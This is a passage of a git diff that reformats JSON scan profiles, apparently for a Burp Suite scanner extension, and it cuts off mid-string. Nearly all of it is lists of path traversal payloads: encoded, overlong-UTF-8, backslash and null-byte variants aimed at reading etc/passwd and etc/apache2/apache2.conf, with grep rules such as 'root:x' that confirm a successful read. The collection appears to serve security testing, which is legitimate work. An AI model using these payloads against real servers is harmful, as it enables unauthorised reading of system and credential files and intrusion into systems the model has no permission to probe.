"true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,///%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,\\\\\\%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..\\\\{FILE}", + "true,..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,./\\/./{FILE}", + "true,./\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,./../{FILE}", + "true,./.././../{FILE}", + "true,./.././.././../{FILE}", + "true,./.././.././.././../{FILE}", + "true,./.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././../{FILE}", + "true,./.././.././.././.././.././.././.././../{FILE}", + "true,.\\..\\{FILE}", + "true,.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}", + "true,.//..//{FILE}", + "true,.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}", + "true,.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}", + "true,../{FILE}", + "true,../..//{FILE}", + "true,../..//../{FILE}", + "true,../..//../..//{FILE}", + "true,../..//../..//../{FILE}", + "true,../..//../..//../..//{FILE}", + "true,../..//../..//../..//../{FILE}", + "true,../..//../..//../..//../..//{FILE}", + "true,..\\{FILE}", + "true,..\\..\\\\{FILE}", + "true,..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}", + "true,..///{FILE}", + "true,../..///{FILE}", + "true,../..//..///{FILE}", + "true,../..//../..///{FILE}", + "true,../..//../..//..///{FILE}", + "true,../..//../..//../..///{FILE}", + "true,../..//../..//../..//..///{FILE}", + "true,../..//../..//../..//../..///{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}", + "true,..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Apache server configuration" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-Apache2-conf", + "IssueSeverity": "Medium", + "IssueConfidence": "Certain", + "IssueDetail": "Linux-Apache2-conf: \u003cbr\u003e \u003cgrep\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "etc/apache2/apache2.conf", + "regex": "String" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 18, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127, + 65, + 32, + 36, + 7, + 1, + 2, + 6, + 33, + 5, + 35, + 34, + 64, + 0, + 3, + 4, + 37, + 127 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-Path-bypass.bb b/profiles/Linux-Path-bypass.bb index a4f3687..e5b9543 100755 --- a/profiles/Linux-Path-bypass.bb +++ b/profiles/Linux-Path-bypass.bb @@ -1 +1,84 @@ -[{"Name":"Linux-Path-bypass","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":["/../{FILE}","/../../{FILE}","/../../../{FILE}","/../../../../{FILE}","/../../../../../{FILE}","/../../../../../../{FILE}","/../../../../../../../{FILE}","/../../../../../../../../{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,root:x"],"Tags":["PathTraversal","All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-path-bypass","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/passwd","regex":"String"},{"type":"Request","match":"([a-zA-Z0-9\\s_\\\\.\\-\\(\\):])+(.png|.jpg|.gif|.bmp|.jpeg|.PNG|.JPG|.GIF|.BMP|.JPEG)","replace":"{PAYLOAD}","regex":"Regex"}],"VariationAttributes":[],"InsertionPointType":[34],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-Path-bypass", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,/../{FILE}", + "true,/../../{FILE}", + "true,/../../../{FILE}", + "true,/../../../../{FILE}", + "true,/../../../../../{FILE}", + "true,/../../../../../../{FILE}", + "true,/../../../../../../../{FILE}", + "true,/../../../../../../../../{FILE}" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,root:x" + ], + "Tags": [ + "PathTraversal", + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Linux-path-bypass", + "IssueSeverity": "High", + "IssueConfidence": "Certain", + "IssueDetail": "Path traversal with payloads: \u003cbr\u003e \u003cpayload\u003e", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [ + { + "type": "Payload", + "match": "{FILE}", + "replace": "etc/passwd", + "regex": "String" + }, + { + "type": "Request", + "match": "([a-zA-Z0-9\\s_\\\\.\\-\\(\\):])+(.png|.jpg|.gif|.bmp|.jpeg|.PNG|.JPG|.GIF|.BMP|.JPEG)", + "replace": "{PAYLOAD}", + "regex": "Regex" + } + ], + "VariationAttributes": [], + "InsertionPointType": [ + 34 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Linux-Path.bb b/profiles/Linux-Path.bb index 95ce64c..0f746a4 100755 --- a/profiles/Linux-Path.bb +++ b/profiles/Linux-Path.bb @@ -1 +1,222 @@ -[{"Name":"Linux-Path","Enabled":true,"Scanner":1,"Author":"@Sy3Omda","Payloads":[".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}","./../{FILE}","./.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","../../{FILE}","../..//{FILE}","../..///{FILE}","../..//../{FILE}","../..//..///{FILE}","../..//../..//{FILE}","../..//../..///{FILE}","../..//../..//../{FILE}","../..//../..//..///{FILE}","../..//../..//../..//{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..//{FILE}","../..//../..//../..//../..///{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","../{FILE}%00.png","../../{FILE}%00.png","../../../{FILE}%00.png","../../../../{FILE}%00.png","../../../../../{FILE}%00.png","../../../../../../{FILE}%00.png","../../../../../../../{FILE}%00.png","../../../../../../../../{FILE}%00.png","....//{FILE}","....//....//{FILE}","....//....//....//{FILE}","....//....//....//....//{FILE}","....//....//....//....//....//{FILE}","....//....//....//....//....//....//{FILE}","....//....//....//....//....//....//....//{FILE}","....//....//....//....//....//....//....//....//{FILE}","....//....//....//....//....//....//....//....//....//{FILE}","....%2F%2F{FILE}","....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%%32%66{FILE}","..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{F